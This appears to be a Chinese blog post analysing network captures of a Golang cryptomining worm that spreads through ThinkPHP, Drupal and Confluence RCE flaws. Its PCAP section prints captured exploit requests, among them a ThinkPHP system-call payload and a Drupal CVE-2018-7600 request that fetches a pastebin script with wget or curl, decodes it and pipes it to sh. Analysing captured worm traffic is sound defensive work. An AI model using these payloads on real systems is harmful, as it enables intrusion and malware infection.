1、web应用远程命令执行漏洞

RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙入侵检测等设备的web管理界面上，一般会给用户提供一个ping操作的web界面,用户从web界面输入目标,提交后,后台会对该P地址进行一次ping测试,并返回测试结果,而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交意想不到的命令,从而让后台进行执行,从而控制整个后台服务器

2、golang挖矿蠕虫

样本6dcbd7ff8aeeb8e9fff861cbea912c2d使用了7种不同的方法:4个web应用程序漏洞(2个针对ThinkPHP,1个针对Drupal, 1个针对Confluence)， SSH凭据枚举，Redis数据库密码枚举，并尝试使用找到的SSH密钥连接其他机器。本文分析web类型漏洞2 targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence

3、PCAP分析

golangpcap下载

80扫描行为

80端口扫描

CVE-2019-3396 Confluence

ThinkPHP5 5.0.23 RCE

thinkphp 5.0.23(完整版)

（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

ThinkPHP5 5.0.23 RCE

CVE-2019-9082

CVE-2019-9082

CVE-2018-7600 Drupal

POST /user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Host: 61.141.0.*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Content-Length: 215

Content-Type: application/x-www-form-urlencoded

X-Forwarded-For: 127.0.0.1

Accept-Encoding: gzip

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=((wget -q -O- https://pastebin.com/raw/xvfxprtb || curl -fsSL https://pastebin.com/raw/xvfxprtb) | base64 -d) | shHTTP/1.1 404 Not Found

CVE-2018-7600 Drupal

参考

【1】CVE-2019-9082 https://vuldb.com/?id.131158

【2】thinkphp 5.X RCE https://www.exploit-db.com/exploits/46150

【3】RCE http://www.hackdig.com/?11/hack-15364.htm

有疑问加站长微信联系（非本文作者）